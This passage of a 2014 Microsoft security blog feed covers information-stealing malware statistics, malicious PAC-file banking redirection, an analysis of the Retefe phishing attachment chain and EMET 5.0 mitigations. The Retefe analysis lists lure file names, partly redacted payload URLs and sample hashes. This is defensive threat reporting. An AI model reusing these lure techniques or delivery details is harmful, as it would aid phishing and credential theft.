partnered with several teams in Microsoft to start the PC Health program. The PC health program has two goals:</p> <ul> <li>To inform and guide customers on additional actions to take when malware might have put their information at risk</li> <li>To monitor the health of PCs running our antimalware products and initiate remediation as required</li> </ul> <p>We&rsquo;ll discuss the PC health program in this two-part blog. Part 1 focuses on the first goal: informing and guiding our customers to take additional action when malware might have put their information at risk.</p> <h3>Information stealing malware</h3> <p><strong>Background and Landscape</strong></p> <p>During 2013, nearly 24 million machines running Microsoft security products encountered information-stealing malware. We estimate that these threats stole user names and passwords, developer code-signing keys, and other data from 4.86M machines. This includes malware that ran, but may not have stolen any data.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/PC1.png"> <img width="500" alt="Information stealing malware graph" src="http://www.microsoft.com/security/portal/blog-images/a/PC1.png" border="0" /></a>&nbsp;</p> <p><em>Figure 1: Monthly count of machines with an active infection, in which the infection is of an information-stealing malware. Families include <a href="http://www.microsoft.com/security/portal/threat/Encyclopedia/Entry.aspx?Name=Win32/Gamarue">Gamarue</a>, <a href="http://www.microsoft.com/security/portal/threat/Encyclopedia/Entry.aspx?Name=Win32/Dorkbot">Dorkbot</a>, <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Zbot">Zbot</a>, <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Banker">Banker</a>, <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Bancos">Bancos</a>, and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Fareit">Fareit</a></em></p> <h3>What can we do to better protect these customers?</h3> <p>First, as part of our malware research and automation, we continue reduce the malware time-to-live; that is, we aim to reduce the time between when malware is released into the wild and when we start detecting it. However, it is also important to inform and appropriately guide our customers to take action and mitigate the impact of information-stealing malware.</p> <p><strong>Inform and guide: mitigating the impact of information-stealing malware</strong></p> <p>Since 2012 and the release of Windows 8, if you&rsquo;re running Microsoft Security Essentials or Windows Defender, and an information-stealing malware gets into your machine, you might see a message similar to this in Windows Action Center:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/PC2.jpg"><img width="500" alt="Action center alert" src="http://www.microsoft.com/security/portal/blog-images/a/PC2.jpg" border="0" /></a>&nbsp;</p> <p><em>Figure 2: Windows Action Center message if your machine gets infected by Zbot</em></p> <em></em> <p>We know from our research that, for example, <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Zbot">Zbot </a>is a malware family known to target user credentials for online banking websites. The message above will appear if your Microsoft antivirus product has detected and removed the threat. However, this message takes recovery one step further: it advises you to change your passwords for the websites that it&rsquo;s known to target.</p> <p>In 2013, a message like this was seen by more than 260,000 users within six months.</p> <p>If you are running System Center Endpoint Protection or Windows Intune, we communicate this information through the event log channel. The administrator can use the information in the event log to determine if the malware ran on the machine. If the malware did run, the event log also contains a link to a description of the threat in our <a href="http://www.microsoft.com/security/portal/threat/Threats.aspx">malware encyclopedia</a>. From there, the admin can assess and take action if the malware exhibits information-stealing behavior.&nbsp;</p> <h3>What do our customers think about this approach?</h3> <p>To determine if customers found this valuable, we monitored user feedback about the Windows Action Center notifications for three months. We received more than three thousand reviews with a 90 percent satisfaction rate.</p> <h3>Further investments</h3> <strong></strong> <p>With the release of Windows 8, your MS account can be used as the primary login across your Windows devices and services (such as Onedrive and Hotmail). To better secure your Microsoft account, we provide the Microsoft Accounts team the PC health information that includes information stealing malware encounters.</p> <p><em>Deepak Manohar and Ina Ragragio</em><br /><em>MMPC</em><br />&nbsp;</p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3624170&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Malicious Proxy Auto-Config redirectionhttp://blogs.technet.com/b/mmpc/archive/2014/02/28/malicious-proxy-auto-config-redirection.aspxFri, 28 Feb 2014 09:59:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:46f4e8a4-2a9d-4c64-9cea-ea6bfec2201amsft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/02/28/malicious-proxy-auto-config-redirection.aspx#comments<div class="ExternalClassB716B63D40B849079E48EADE19F0CC3C"> <p>Internet banking credentials are a desired target for cybercriminals. They can be targeted with man-in-the-middle attacks or through password stealing trojans such as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=PWS:Win32/Fareit">Fareit</a>, <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=PWS:Win32/Zbot">Zbot </a>or <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?name=Win32/Banker">Banker</a>. A less known, yet commonly found in South America and to a lesser extent in Russia, method to gain unauthorized access to a user&rsquo;s banking credentials is through malicious <a href="http://technet.microsoft.com/en-us/library/dd361918.aspx">Proxy Auto-Config </a>(PAC) files. Normally, PAC files offer similar functionality to the <a href="http://technet.microsoft.com/en-us/library/cc751132.aspx">hosts </a>file, allowing IP/website redirection, but only for the browser. Unfortunately, they can also be used for nefarious purposes.</p> <p>When a user is infected with a malicious PAC and visits an internet banking website, the browser is usually redirected to a fake website that mimics the intended banking website. This may result in credentials being stolen - or worse, online account hijacking.</p> <p>The most common infection scenario is shown in figure 1 below:</p> <p>&nbsp;</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/PAC1.jpg"><img width="500" alt="Common infection scenario" src="http://www.microsoft.com/security/portal/blog-images/a/PAC1.jpg" border="0" /></a>&nbsp;</p> <p><em>Figure 1: A common PAC infection scenario</em></p> <p>A user is infected through a drive-by attack or by other malware and a malicious PAC file is installed onto their computer. When the victim visits a targeted website, their browser is redirected to a fake website that will record their login details. The infection is silent, the user is not notified of the change in configuration (see figure 5).</p> <p>Our telemetry shows the following country domains are the most targeted by malicious PAC files:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Pac2.png"> <img width="500" alt="Infection telemtery" src="http://www.microsoft.com/security/portal/blog-images/a/PAC2.png" border="0" /></a>&nbsp;</p> <p><em>Figure 2: Countries most targeted by malicious PACs</em></p> <p>Analysis of the malicious PAC files show that cybercriminals target mostly banking websites in Brazil and Russia, but many attacks are not limited to just online banking entities. We have also seen malicious redirection against other payment methods, such as credit cards, e-mail providers, social networking websites, antivirus products and education institutions. Our <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanProxy:JS/Banker.gen%21A#tab=2">TrojanProxy:JS/Banker.gen!A</a> description has a detailed list of the targeted entities.</p> <p>One important user mitigation comes directly through the browser. What a user would experience when browsing the real website is shown below:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Pac3.jpg"> <img width="500" alt="browser unsecure" src="http://www.microsoft.com/security/portal/blog-images/a/Pac3.jpg" border="0" /></a>&nbsp;</p> <p><em>Figure 3: Web page without PAC redirection</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/pac4.jpg"> <img width="500" alt="browser secure" src="http://www.microsoft.com/security/portal/blog-images/a/Pac4.jpg" border="0" /></a>&nbsp;</p> <p><em>Figure 4: Web page with malicious PAC redirection</em></p> <p>You can see above that the original website has an authenticated certificate and appears in a green address bar. The original website is also using HTTPS (secure communication).</p> <p>Any PAC file installation (legit or otherwise) can be manually checked in Internet Explorer by opening the Tools menu, then selecting Internet Options, clicking the Connection tab, and selecting LAN Settings. If you see something similar to the following picture and you didn&rsquo;t install a PAC file, then you might be infected. Keep in mind that the PAC file can also be installed from the internet (using a&nbsp; http:// address), not only as a local file.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/pac5.jpg"> <img width="500" alt="Pac installed" src="http://www.microsoft.com/security/portal/blog-images/a/PAC5.jpg" border="0" /></a>&nbsp;</p> <p><em>Figure 5: LAN setting showing a PAC file installed</em></p> <p>Deleting the file entry in &ldquo;Use automatic configuration script&rdquo; (or disabling it) and the local file referenced can help mitigate an attack.</p> <p>In order to deal with these malicious PAC files we have added several detections, such as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanProxy:JS/Banker.AC#tab=2">TrojanProxy:JS/Banker.AC</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanProxy:JS/Banker.gen%21A#tab=2">TrojanProxy:JS/Banker.gen!A</a>, and we will continue adding detections for any malicious PAC files we find in the wild. To better protect yourself against these threats, we recommend installing an up-to-date real-time security product, such as Microsoft Security Essentials.</p> <p><em>MMPC Munich</em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3623947&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> A close look at a targeted attack delivery http://blogs.technet.com/b/mmpc/archive/2014/02/27/a-close-look-at-a-targeted-attack-delivery.aspxThu, 27 Feb 2014 15:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:7d009dfa-42c8-476d-98a6-d9bd4690f858msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/02/27/a-close-look-at-a-targeted-attack-delivery.aspx#comments<div class="ExternalClassEEDECD50DB8A4254AC8D4D6B095194FE"> <p>For antimalware products, targeted attacks represent a very interesting class of malware. They are stealthy and only target specific organizations and industries - flying under the radar when it comes to identifying new malware files based on telemetry. The purpose of these attacks is most commonly to steal confidential and sensitive information by means of social engineering and unpatched, vulnerable software.</p> <p>We recently investigated a sample used in this kind of attack, <span class="ms-rteThemeBackColor-1-0"> <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Retefe.A#tab=1"> Trojan:Win32/Retefe.A</a></span>, and wanted to share with you what we encountered and possible ways to avoid being infected from similar approaches.</p> <p>Our analysis began when we investigated an RTF document flagged as suspicious due to its inclusion in what looked like a phishing email:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Target1.jpg"> <img width="500" alt="Suspicious RTF doc" src="http://www.microsoft.com/security/portal/blog-images/a/Target1.jpg" border="0" /></a>&nbsp;</p> <p><em>Figure 1: RTF document attached to phishing email</em></p> <p>The email sender was spoofed by the attackers to appear as a large e-commerce company. The message is in German and is translated as &ldquo;The receipt, from your Zalando Switzerland team&rdquo;. Another reason for flagging the email as phishing was due to the sentence structure &ndash; it seems to be the result of an automated translation tool.</p> <p>When a user attempts to open the RTF document they get the following warning from Outlook:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Target2.jpg"> <img width="500" alt="Outlook warning" src="http://www.microsoft.com/security/portal/blog-images/a/Target2.jpg" border="0" /></a>&nbsp;</p> <p><em>Figure 2: An attempt to open the RTF prompts an Outlook warning </em></p> <p>At this point we were thinking that the RTF might contain a vulnerability that would be triggered when opening the file. However, when it was opened the document showed no indication that it contained an exploit &ndash; it just displays a small document:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Target3.jpg"> <img width="500" alt="small document" src="http://www.microsoft.com/security/portal/blog-images/a/Target3.jpg" border="0" /></a>&nbsp;</p> <p><em>Figure 3: The attachment opens a small document </em></p> <p>Again the text is in German and translates as &ldquo;To see the receipt, double click on the image&rdquo;. At this point it was obvious we were dealing with a social engineering attack. The attacker is asking the victim to execute the malware willingly on their machine. Even at this point the user would see a warning message about the risks taken when executing an unknown attachment:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Target4.jpg"> <img width="500" alt="Warning message" src="http://www.microsoft.com/security/portal/blog-images/a/Target4.jpg" border="0" /></a>&nbsp;</p> <p><em>Figure 4: Security warning when attempting to open suspicious attachment </em></p> <p>The file, which is executed if the user proceeds and clicks Open, is a Control Panel Applet (CPL). Its purpose is to establish a network connection to a malicious server and download the payload file. This particular CPL file tried to download its payload from <em>www.ent&lt;removed&gt;.ch/n.exe.</em></p> <p>At the time of our investigation the file was no longer available, but since this was not the only attempt the bad guys have made, we were able to retrieve the payload from a URL used in similar attacks: <em> www.&lt;removed&gt;-club.ch/n.exe</em></p> <p>We detect payload as <span class="ms-rteThemeBackColor-1-0"></span> <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Retefe.A#tab=1"> <span class="ms-rteThemeBackColor-1-0"> </span> <span class="ms-rteThemeBackColor-1-0">Trojan:Win32/Retefe.A.</span></a></p> <p>The file name of the RTF document is not consistent throughout all attacks. We have seen other names used that follow a similar pattern as those below:</p> <ul> <li>2379F939.rtf</li> <li>O442Z4nV.rtf&nbsp;&nbsp;&nbsp;&nbsp;</li> <li>Quittung 05-02.14.rtf</li> <li>Quittung 2014.05.02.rtf</li> <li>uozohS+K.rtf</li> <li>uvsWuIaY.rtf</li> <li>vMtz+mFA.rtf</li> <li>YdBoUSiG.rtf</li> <li>YgRUlKut.rtf</li> </ul> <p>We&rsquo;ve also observed variations where the RTF document was replaced by a .DOC file following the same infection strategy. The file names used are similar, for example:</p> <ul> <li>Quittung 2014.05.02.doc</li> <li>Quittung 05-02.14.doc</li> <li>unnamed.doc</li> </ul> <p>The document can also be embeded in an archive from which the user needs to extract the .RTF or .DOC file. Example file names include:</p> <ul> <li>A1 Rechnung #13784126 von 05-02-2014.zip</li> <li>A1 Rechnung #746537 von 050214.zip</li> <li>Ihre Bestellung #83919469&nbsp; vom 03022014.zip</li> <li>Ihre Bestellung&nbsp; N9397351&nbsp; vom 0402-14.zip</li> </ul> <p>Trojan:Win32/Retefe.A also displays a window where it informs the user that they need to install an &ldquo;update&rdquo; and advises them to click &ldquo;Yes&rdquo; when the UAC window is displayed. This is another layer of social engineering to trick the user and avoid making them suspicious. The message even shows which button to press in the UAC, and can appear in English or German depending on the computer locale.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Target5c.png"> <img alt="English" src="http://www.microsoft.com/security/portal/blog-images/a/Target5c.png" border="0" /></a>&nbsp;</p> <p><em>Figure 5: Further social engineering from Trojan:Win32/Retefe.A advises the user to run the malware</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Target6.jpg"> <img width="500" alt="Engineering script" src="http://www.microsoft.com/security/portal/blog-images/a/Target6.jpg" border="0" /></a>&nbsp;</p> <p><em>Figure 6: The strings encountered in the binary of the social engineering message</em></p> <p>As shown above, threats such as Trojan:Win32/Retefe.A use multiple techniques to encourage users to run the malicious file. The user also receives numerous warning about the danger of proceeding. Despite these warning we still have reports of this threat running on machines - primarily in German speaking countries. Running an up-to-date, real-time security product, such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a>, can help protect your PC from this type of malicious threat. However, the best form of defence is to avoid these malicious files from running in the first place. The easiest way to do this is to educate users on the risk of opening unsolicited email attaments and <a href="http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx">recognising a phising email</a>.</p> <p><strong>Reference files:</strong></p> <p>Downloaded file:</p> <ul> <li>SHA1: 0e832c750e445484494923ce5e2e385cc73a4df1</li> <li>MD5: aa19c341970a39bac50eabf634b6262d</li> <li>Detected : Trojan:Win32/Retefe.A</li> </ul> <p>CPL file:</p> <ul> <li>SHA1: 3b86362334fce7e339f2fd36901eb30043b9481d</li> <li>MD5: 26e2ef85182c0e14a90e1108ab6f644f</li> <li>Detected : TrojanDownloader:Win32/Retefe.A</li> </ul> <p><br /> <em>MMPC Munich</em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3623865&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Announcing EMET 5.0 Technical Previewhttp://blogs.technet.com/b/srd/archive/2014/02/25/announcing-emet-5-0-technical-preview.aspxTue, 25 Feb 2014 17:32:20 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:12c2c343-59c0-44c7-b0db-642fc76aa16fswiat0<p><span>Today, we are thrilled to announce a preview release of the next version of the Enhanced Mitigation Experience Toolkit, better known as EMET. You can download EMET 5.0 Technical Preview <a href="http://www.microsoft.com/emet"><span style="color:#0563c1;">here</span></a>. This Technical Preview introduces new features and enhancements that we expect to be key components of the final EMET 5.0 release. We are releasing this technical preview to gather customer feedback about the new features and enhancements. Your feedback will affect the final EMET 5.0 technical implementation. We encourage you to download this Technical Preview, try it out in a test environment, and let us know how you would like these features and enhancements to show up in the final version. If you are in San Francisco, California, for the <a href="http://www.rsaconference.com/events/us14"><span style="color:#0563c1;">RSA Conference USA 2014</span></a>, please join us at the Microsoft booth (number 3005) for a demo of EMET 5.0 Technical Preview and give us feedback directly in person.&nbsp; Several members of the EMET team will be demonstrating at the Microsoft booth for the entire Conference.</span></p> <p><span>As mentioned, this Technical Preview release implements new features to disrupt and block the attacks that we have detected and analyzed over the past several months. The techniques used in these attacks have inspired us with new mitigation ideas to disrupt exploitation and raise the cost to write reliable exploits. The EMET 5.0 Technical Preview also implements additional defensive mechanisms to reduce exposure from attacks.</span></p> <p><span>The two new features introduced in EMET 5.0 Technical Preview are the <b>Attack Surface Reduction (ASR)</b> and the <b>Export Address Table Filtering Plus (EAF+)</b>. Similar to what we have done with EMET 3.5 Technical Preview, where we introduced a new set of mitigations to counter Return Oriented Programming (ROP), we are introducing these two new mitigations and ask for your feedback on how they can be improved. Of course, they are a &ldquo;work in progress.&rdquo; Our goal is to have them polished for the final version of EMET 5.0.</span></p> <p><span>Let&rsquo;s see in detail what these two new mitigations do, and the reasoning that led us to their implementation.</span></p> <p><span><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/2555.pic1.png"><img style="margin-right:auto;margin-left:auto;display:block;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/2555.pic1.png" border="0" /></a></span></p> <h2>Attack Surface Reduction</h2> <p style="margin:0in 0in 8pt;"><span>In mid-2013, <a href="http://support.microsoft.com/kb/2751647"><span style="color:#0563c1;">we published a Fix it solution</span></a> to disable the Oracle Java plug-in in Internet Explorer. We received a lot of positive feedback and a number of suggestions on how we could improve the Fix it. The most recurring suggestion we received was to allow the Oracle Java plug-in on intranet websites, which commonly run Line-of-Business applications written in Java, while blocking it on Internet Zone websites. In addition to that Java-related customer feedback, we have also seen a number of exploits targeting the Adobe Flash Player plug-in. For example, the <a href="http://news.cnet.com/8301-27080_3-20051071-245.html"><span style="color:#0563c1;">RSA breach was enabled by an Adobe Flash Player exploit</span></a> embedded inside a Microsoft Excel file and a number of targeted attacks have been carried out by Adobe Flash Player exploits embedded in Microsoft Word documents, as described by <a href="https://citizenlab.org/2014/02/mapping-hacking-teams-untraceable-spyware/"><span style="color:#0563c1;">Citizen Lab</span></a>. We decided to design a new feature that can be used to mitigate similar situations and to help to reduce the attack surface of applications. We call this feature Attack Surface Reduction (ASR), and it can be used as a mechanism to block the usage of a specific modules or plug-ins within an application. For example, you can configure EMET to prevent Microsoft Word from loading the Adobe Flash Player plug-in, or, with the support of <a href="http://msdn.microsoft.com/en-us/library/ie/ms537183(v=vs.85).aspx#zones"><span style="color:#0563c1;">security zones</span></a>, you can use EMET to prevent Internet Explorer from loading the Java plug-in on an Internet Zone website while continuing to allow Java on Intranet Zone websites.</span></p> <p style="margin:0in 0in 8pt;"><span>The example below shows ASR in action, preventing Microsoft Word from launching an Adobe Flash Player file embedded in the document. By default, EMET 5.0 Technical Preview comes pre-configured to block certain plug-ins from being loaded by Internet Explorer, Microsoft Word and Microsoft Excel. The feature is fully configurable by changing two registry keys that list the names of the plug-ins to block, and, if supported, the security zones that allow exceptions. For more details on how to configure ASR please refer to the EMET 5.0 Technical Preview <a href="http://www.microsoft.com/en-us/download/details.aspx?id=41963" target="_blank">user guide</a>.</span></p> <p style="text-align:center;"><span><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/2728.pic2.png"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/2728.pic2.png" border="0" /></a></span></p> <h2>EAF+</h2> <p><span>We also added new capabilities to the existing Export Address Table Filtering (EAF). EAF+ consolidates protection of lower-level modules and prevents certain exploitation techniques used to build dynamic ROP gadgets in memory from export tables. EAF+ can be enabled through the &ldquo;Mitigation Settings&rdquo; ribbon. When EAF+ is enabled, it will add the following additional safeguards over-and-above the existing EAF checks:</span></p> <ul> <li> <p><span>Add protection for KERNELBASE exports in addition to the existing NTDLL.DLL and KERNEL32.DLL</span></p> </li> <li> <p><span>Perform additional integrity checks on stack registers and stack limits when export tables are read from certain lower-level modules</span></p> </li> <li> <p><span>Prevent memory read operations on protected export tables when they originate from suspicious modules that may reveal memory corruption bugs used as &ldquo;read primitives&rdquo; for memory probing</span></p> </li> </ul> <p><span>For example, the third protection mechanism in the list above mitigates the exploitation technique developed in Adobe Flash Player used in some recent Internet Explorer exploits (CVE-2013-3163 and CVE-2014-0322), where the attacker attempted to build ROP gadgets by scanning the memory and parsing DLL exports using ActionScript code. Exploits for these vulnerabilities are already blocked by other EMET mitigations. EAF+ provides another way to disrupt and defeat advanced attacks. The screenshot below shows the exploit for CVE-2014-0322 in action on Internet Explorer protected by EMET 5.0 Technical Preview with only EAF+ enabled.<br /></span></p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/0876.pic3.png"><img style="margin-right:auto;margin-left:auto;display:block;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/0876.pic3.png" border="0" /></a></p> <h2>Other improvements</h2> <p><span>This Technical Preview enables the &ldquo;Deep Hooks&rdquo; mitigation setting. We have been working with third-party software vendors whose products do not run properly with Deep Hooks enabled. We believe these vendors have resolved the application compatibility issues that previously existed with Deep Hooks enabled. We enable Deep Hooks in the Technical Preview to evaluate the possibility of having this setting turned on by default in the final EMET 5.0 release because it has proven to be effective against certain advanced exploits using ROP gadgets with lower level APIs. We have also introduced some additional hardening to protect EMET&rsquo;s configuration when loaded in memory, and fixed several application compatibility issues including a common one that involves Adobe Reader and the &ldquo;MemProt&rdquo; mitigation.</span></p> <h2>Acknowledgments</h2> <p><span>We&rsquo;d like to thank Spencer J. McIntyre from SecureState, Jared DeMott from Bromium Labs, along with Peleus Uhley and Ashutosh Mehra from the Adobe Security team <span style="line-height:107%;">for their collaboration on the EMET 5.0 Technical Preview</span>.</span></p> <p><span>We are excited for this Technical Preview and we hope that the additions are as valuable for our customers as they are for us. We invite you to install and give EMET 5.0 Technical Preview a try; we look forward to hearing your feedback and suggestions on how to enhance the new features that we have introduced. We would also welcome any suggestions for additional new features you&rsquo;d like to see included in the final version of EMET 5.0. We greatly value the feedback we receive, and we want to build a product that not only provides additional protection to systems but is also easy to use and configure. We then invite you all to download <a href="http://www.microsoft.com/emet"><span style="color:#0563c1;">EMET 5.0 Technical Preview</span></a> and <a href="mailto:emet_feedback@microsoft.com"><span style="color:#0563c1;">drop us a line</span></a>!</span></p> <ul> <li> <p><span>The EMET Team</span></p> </li> </ul><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3623486&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">EMET Announcing the Enhanced Mitigation Experience Toolkit (EMET) 5.0 Technical Previewhttp://blogs.technet.com/b/msrc/archive/2014/02/25/announcing-the-enhanced-mitigation-experience-toolkit-emet-5-0-technical-preview.aspxTue, 25 Feb 2014 17:30:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:7aca5297-1b83-464c-9d20-ab7be2e2869cChris Betz0<p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/1033.emet1.jpg"></a>I&rsquo;m here at the Moscone Center, San Francisco, California, attending the annual <a href="http://www.rsaconference.com/events/us14"><span style="color:#0563c1;">RSA Conference USA 2014</span></a>. There&rsquo;s a great crowd here and many valuable discussions. Our Microsoft Security Response Center (MSRC) engineering teams have been working hard on the next version of EMET, which helps customers increase the effort attackers must make to compromise a computer system.</p> <p>I&rsquo;m happy to announce the public release of the <a href="http://www.microsoft.com/emet"><span style="color:#0563c1;">EMET 5.0 Technical Preview</span></a> today from the RSA exhibit hall.</p> <p>During last night&rsquo;s RSA reception, conference attendees got a sneak preview of EMET 5.0 as demonstrated by Jonathan Ness, Chengyun Chu, Elia Florio and Elias Bachaalany from our EMET engineering team. If you missed it, we&rsquo;ll have our EMET engineering team here all week at RSA demonstrating the current version of EMET 4.1, as well as the EMET 5.0 Technical Preview, at the Microsoft Booth (number 3005).</p> <p>EMET anticipates the most common actions and techniques adversaries might use in compromising a computer, and can help protect the computer by diverting, terminating, blocking and invalidating those actions and techniques. In recent 0-days, EMET has been an effective mitigation against memory corruption. Having EMET installed and configured on computers meant that the computers were protected from those attacks.</p> <p>EMET 5.0 Technical Preview adds new protections for enterprises on top of the <a href="http://technet.microsoft.com/en-us/security/jj653751"><span style="color:#0563c1;">12 built-in security mitigations</span></a> included in version 4.1. For instance, the new Attack Surface Reduction mitigation allows enterprises to better protect third-party and custom-built applications by selectively enabling Java, Adobe Flash Player and Microsoft or third-party plug-ins. At the Security Research and Defense blog, our engineering team provides a <a href="http://blogs.technet.com/b/srd/archive/2014/02/21/announcing-emet-5-0-technical-preview.aspx"><span style="color:#0563c1;">deep dive blog post</span></a> on EMET 5.0 Technical Preview.</p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/8306.emet1.jpg"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/8306.emet1.jpg" border="0" /></a></p> <p>Since the first release of EMET in 2009, our customers and the security community have adopted EMET and provided us with valuable feedback. Your feedback both in <a href="http://social.technet.microsoft.com/Forums/en/emet/threads"><span style="color:#0563c1;">forums</span></a> and through <a href="http://www.microsoft.com/en-us/microsoftservices/support.aspx"><span style="color:#0563c1;">Microsoft Premier Support Services</span></a>, which provides enterprise support for EMET, has helped shape the new EMET capabilities to further expand the range of scenarios it addresses.</p> <p>The same goes for EMET 5.0 Technical Preview. As we march towards the final release of EMET 5.0, we would like to invite you to download the EMET 5.0 Technical Preview at <a href="http://www.microsoft.com/emet"><span style="color:#0563c1;">microsoft.com/emet</span></a> to deploy in your test environments. Your feedback is valuable in shaping our roadmap. Please <a href="http://social.technet.microsoft.com/Forums/en/emet/threads"><span style="color:#0563c1;">let us know</span></a> what you think.</p> <p>Finally, if you&rsquo;re at the RSA Conference, please stop by our booth and share your feedback with Jonathan, Chengyun, Elia and Elias. We&rsquo;d like to hear from you!</p> <p>Thanks,<br /><a href="http://blogs.technet.com/b/msrc/about.aspx#Chris_Betz"><span style="color:#0563c1;">Chris Betz</span></a><br /> Senior Director<br />Microsoft Security Response Center (MSRC)</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3623596&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">AnnouncementsEMET The MSRT in Action: Keeping systems safehttp://blogs.technet.com/b/mmpc/archive/2014/02/20/the-msrt-in-action-keeping-systems-safe.aspxFri, 21 Feb 2014 00:54:38 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:790350fb-bd45-48f1-8e0b-18f11926b49emsft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/02/20/the-msrt-in-action-keeping-systems-safe.aspx#comments<p>In four days the January release of the Microsoft Malicious Software Removal Tool (MSRT) detected almost a million threats on PCs across the globe.</p> <p>In the video below, Dustin Childs and Joe Faulhaber explain what happened as the MSRT sprang into action.</p> <p><iframe width="500" height="281" src="http://www.youtube.com/embed/7gUTRuNAB0s" frameborder="0"></iframe></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3623318&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Fix it tool available to block Internet Explorer attacks leveraging CVE-2014-0322http://blogs.technet.com/b/srd/archive/2014/02/19/fix-it-tool-available-to-block-internet-explorer-attacks-leveraging-cve-2014-0322.aspxWed, 19 Feb 2014 23:12:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:53dd3f9b-522b-4194-a2b9-e15681af90b1SRD Blog Author0<p>Today, we released <a href="http://technet.microsoft.com/en-us/security/advisory/2934088">Security Advisory 2934088</a> to provide guidance to customers concerned about a new vulnerability found in Internet Explorer versions 9 and 10. This vulnerability has been exploited in limited, targeted attacks against Internet Explorer 10 users browsing to www.vfw.org and www.gifas.asso.fr. We will cover the following topics in this blog post:</p> <ul> <li><span style="font-size:small;"><strong>Platforms affected</strong></span></li> <li><span style="font-size:small;"><strong>Steps you can take to stay safe</strong></span></li> <li><span style="font-size:small;"><strong>More details about the vulnerability</strong></span></li> <li><span style="font-size:small;"><strong>More details about the Fix It tool</strong></span></li> </ul> <p><b>Platforms Affected</b></p> <p>As described in <a href="http://technet.microsoft.com/en-us/security/advisory/2934088">Security Advisory 2934088</a>, both Internet Explorer 9 and Internet Explorer 10 contain the vulnerable code. However, we have not seen any exploit code capable of triggering the vulnerability on Internet Explorer 9. The chart below may help explain the risk by platform:</p> <table border="1"> <tbody> <tr> <td>&nbsp;</td> <td>Windows XP<br />Server 2003</td> <td>Windows Vista<br />Server 2008</td> <td>Windows 7<br />Server 2008 R2</td> <td>Windows 8<br />Server 2012</td> <td>Windows 8.1<br />Server 2012 R2</td> </tr> <tr> <td>Internet Explorer 6</td> <td bgcolor="green">Not vulnerable</td> <td>n/a</td> <td>n/a</td> <td>n/a</td> <td>n/a</td> </tr> <tr> <td>Internet Explorer 7</td> <td bgcolor="green">Not vulnerable</td> <td bgcolor="green">Not vulnerable</td> <td>n/a</td> <td>n/a</td> <td>n/a</td> </tr> <tr> <td>Internet Explorer 8</td> <td 